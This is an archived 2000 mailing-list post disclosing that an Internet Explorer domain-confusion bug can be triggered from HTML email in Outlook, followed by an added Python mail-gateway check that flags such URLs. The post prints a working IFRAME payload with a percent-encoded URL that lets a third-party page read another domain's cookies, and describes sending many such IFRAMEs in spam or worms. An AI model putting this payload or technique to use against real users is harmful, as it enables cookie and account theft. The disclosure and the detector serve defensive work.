Subject: IE Domain Confusion Vulnerability is an Email problem also
From: Richard M. Smith (rms2000 BELLATLANTIC.NET)
Date: Fri May 12 2000 - 07:33:48 CDT
- In reply to: Foo Bar: "IE Domain Confusion Vulnerability"
Hi,
This same IE bug can also be exploited from an HTML Email
message in Outlook and Outlook Express. The trick is
to put the magic URL in an HTML IFRAME tag. Example:
<iframe
src="http://www.peacefire.org%2fsecurity%2fiecookies%2f
showcookie.html%3f.yahoo.com/">
</iframe>
A malicious Email message could include many IFRAMEs
to grab cookies from different domains. The cookies
are stolen when the message is read.
Using an Email message, an attack can be directed
at a particular person or a group of people without
them ever going to a Web site. The exploit could
also be included in a spam Email message or in the
payload of an Email worm/virus.
I suspect that the same trick works in newsgroup messages,
but I haven't had the time to run the experiment.
This is a pretty bad bug. People's private data at
Web sites is at risk here.
Richard
==========================================
Richard M. Smith
Internet consultant
Email: rms2000 bellatlantic.net
http://www.tiac.net/users/smiths
==========================================
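
An added detection example, not part of the original message: a mail-gateway style check that parses an HTML body and flags any URL attribute whose host (authority) part contains a percent-encoded delimiter, which is the shape of the IFRAME URL in the post. The function names, the attribute list and the sample body are assumptions made for this illustration.

```python
import re
from html.parser import HTMLParser

# URL-bearing attributes to inspect (assumed list for this example).
URL_ATTRS = {"src", "href", "background", "action"}
# Encoded "/", "?", "#", "@" or "\" never belong inside a hostname.
ENCODED_DELIM = re.compile(r"%(2f|3f|23|40|5c)", re.IGNORECASE)
AUTHORITY = re.compile(r"^[a-z][a-z0-9+.-]*://([^/?#]*)", re.IGNORECASE)


def suspicious_authority(url):
    """Return the raw authority if it hides an encoded delimiter, else None."""
    url = re.sub(r"\s+", "", url)  # undo hard-wrapping inside the attribute
    m = AUTHORITY.match(url)
    if m and ENCODED_DELIM.search(m.group(1)):
        return m.group(1)
    return None


class _Scanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            hit = suspicious_authority(value) if name in URL_ATTRS and value else None
            if hit:
                self.findings.append((tag, name, hit))


def scan_html_body(html):
    """Return (tag, attribute, authority) for every suspicious URL in an HTML body."""
    scanner = _Scanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: the iframe from the post plus a benign image.
SAMPLE = """<iframe
src="http://www.peacefire.org%2fsecurity%2fiecookies%2f
showcookie.html%3f.yahoo.com/">
</iframe>
<img src="http://www.example.com/logo.gif?x=%2f">"""

if __name__ == "__main__":
    for tag, attr, authority in scan_html_body(SAMPLE):
        print(f"{tag} {attr}: encoded delimiter in authority {authority!r}")
```

Encoded delimiters in the path or query, as in the benign image URL, are not flagged; only the part before the first literal "/", "?" or "#" is examined.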